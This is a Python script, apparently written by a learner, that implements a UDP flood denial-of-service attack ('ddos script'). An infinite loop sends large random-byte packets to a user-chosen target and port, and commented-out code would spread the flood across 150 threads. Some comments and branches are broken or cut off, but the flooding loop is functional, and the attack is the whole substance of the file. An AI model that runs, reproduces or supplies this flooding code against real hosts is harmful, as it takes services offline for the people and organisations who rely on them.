import os import platform import random # import threading import socket # TODO: Read docs on time, os, random, threading, and platform # TODO: Take questions to Mastodon # TODO: Eat good food # TODO: Get plenty of water and sleep # v1: just create ddos script # Instead of using SOCK_STREAM for TCP connections # using SOCK_DGRAM for UDP connections to keep packets small # If iterating on this, will use SOCK_STREAM to send bigger packets if I actually understand # what that means for the network being hit # Is there enough precedent with ipv6 addresses to use socket.AF_INET6? # How would that work? # TODO: research ipv6 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes1 = random.randbytes(2000) bytes2 = random.randbytes(2900) system = platform.uname().system # this is better system = getattr(platform.uname(), "system") # instead of hardcoding a specific index # because if something in the l def check_os(): if system == 'Windows': os.system("cls") elif system == 'Unix': os.system("clear") # call function to check what system is used # Why use a try def init_app(target, port, ipaddress): sent = 0 try: while True: sock.sendto(bytes1, (target, port)) sent = sent + 1 print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port)) while True: sock.sendto(bytes2, (target, port)) sent = sent + 1 print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port)) # Break out of infinite loop except KeyboardInterrupt: print('\n' + 'Keyboard Interrupt. Terminating session...') except socket.gaierror: print('Unknown address.') print('Please input the correct ip address.') except NameError: print('Unknown address.') print('Please input the correct ip address.') # For introducing to the script later # for i in range(150): # thread = threading.Thread(target=ddos) # thread.start()